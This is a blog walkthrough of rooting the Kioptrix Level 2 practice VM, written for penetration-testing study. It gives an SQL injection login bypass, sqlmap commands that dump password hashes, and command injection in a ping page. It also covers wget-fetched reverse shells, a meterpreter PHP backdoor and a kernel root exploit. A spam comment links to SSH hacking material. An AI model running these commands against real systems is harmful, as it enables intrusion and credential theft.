Sunday, 19 August 2012

Kioptrix Level 2

Hi everyone, in this post I will explain how to get root on Kioptrix LEVEL 2.
Lets start with the basics, nmap!


Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-13 10:30 BST
Nmap scan report for 172.16.1.189
Host is up (0.021s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE              VERSION
22/tcp   open  ssh                  OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http                 Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind (rpcbind V2) 2 (rpc #100000)
443/tcp  open  ssl/http             Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp                  CUPS 1.1
3306/tcp open  mysql                MySQL (unauthorized)
MAC Address: 00:50:56:AF:62:3F (VMware)
Ok , so for this one ,lets try to access apache on that ip address Open your browser and and type the ip address of your kioptrix, in my case is http://172.16.1.189 As you can see there is a login webpage , we don't know the user/password, but  we can guess, OR try to do a sql injection, in my case, I am doing the sql  injection, so on the username field, type : admin  , and on the password field
type : ' OR 1=1 -- -
If you want to dig a bit more on the sql injection side of things, we can use sqlmap to fetch some information from the database. Here are some examples:
1) Available databases :
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --dbs
Result:
available databases [2]:
[*] `test\_%`
[*] test
2) Identify the current database
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --current-db
Result :
current database:    'webapp'
3) Find all mysql users passwords
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --passwords
Result :
[*] john [1]:
    password hash: 5a6914ba69e02807
[*] root [1]:
    password hash: 5a6914ba69e02807
And so on. You can also have a sql shell on the server if you want.
./sqlmap.py -u "http://172.16.1.189" --data "uname=admin&psw=xx' or OR 1=1 -- -" --sql-shell
>select * from users; [2]:
[*] 1, 5afac8d85f, admin
[*] 2, 66lajGGbla, john

Now, coming back to the browser you can see a new web page saying that you can  ping a machine on the network, that means we can execute commands and if not properly configured, we can run more than just "ping". Lets try ping first, then we can try something else. If you typed your ip address on that box, you will be forwarded to http://172.16.1.189/pingit.php That's the one we need to look now. So, instead just ping, lest try to add something else to the command like "; cat /etc/passwd" and see what happens.As you can see, we can read the /etc/passwd, that means we have a webshell to
the server and now  we can execute anything ( almost ;) )  , so lets upload our backdoor to the server.
We can do this in many ways, I will me explaining the 2 methods:
1) Upload a reverse shell ( the easyest way)
172.16.1.1 ;  wget -O /tmp/reverse_shell
http://172.16.1.79/exploits/reverse_shell2
2) Change permission to execute.
172.16.1.1 ; chmod 777 /tmp/reverse_shell
3) Prepare your BT server for the connection
nc -l -p 10000
4)And now run the reverse_shell
172.16.1.1 ; /tmp/reverse_shell
Done, now we have shell, we can try the same using backtrack.
1) We need to start apache :  /etc/init.d/apache2 start
2) We need to create our backdoor:
LHOST : IP of your backtrack
LPORT : Port that backtrack will be listening to
/var/www/backdoor.php.txt : That's where it will save your backdoor.
So the complete command is :
msfpayload php/meterpreter/reverse_tcp LHOST=172.16.1.79 LPORT=8080 R >
/var/www/backdoor.php.txt

Now, we need to start our session handler.

msfconsole
use multi/handler
search php
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 8080
exploit -j -z
Leave this one running and open open another shell on your backtrack.
We need to edit our backdoor.php.txt ( script kid stuff)
vi /var/www/backdoor.php.txt. Remove "#" from the first line and save it.

Next step is to insert this in our ping command line .
172.16.1.1 ; cd /tmp ; wget -O backdoor.php 172.16.1.79/backdoor.php.txt ; php
-f backdoor.php
If you look into that other shell, you should be reading this by now :
[*] Sending stage (39217 bytes) to 172.16.1.189
[*] Meterpreter session 4 opened (172.16.1.79:8080 -> 172.16.1.189:32807) at
2012-08-13 14:12:00 +0100
meterpreter >
Great, now that we have access to the box, we need to get root.
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686
i386 GNU/Linux

Now we need to find an exploit for that kernel . If you google it, you will end up on securityfocus or other similar. You can download the exploit from securityfocus or from exploit-db or use the  one that is inside backtrack.
http://www.exploit-db.com/exploits/9542/
http://www.securityfocus.com/bid/36108/info

Or ... you can search inside backtrack.
/pentest/exploits/exploitdb/searchsploit  kernel linux local
And that's the one you are looking for
Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit           /linux/local/9435.txt
Again, you can try other exploits as well. Now that you have the exploit, compile it and run it on the target machine.
wget http://172.16.1.79/exploits/ip_append_data.c
gcc -o get_root ip_append_data.c
./get_root
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

And that's it, game over.

5 comments:

  1. What is the default login password of Kioptrix 1 ?

    ReplyDelete
  2. None, that's part of the challenge :)

    ReplyDelete
  3. This comment has been removed by a blog administrator.

    ReplyDelete
  4. how to hack ssh root

    http://bicombusiness.blogspot.com/2016/01/sshpro13-final.html

    ReplyDelete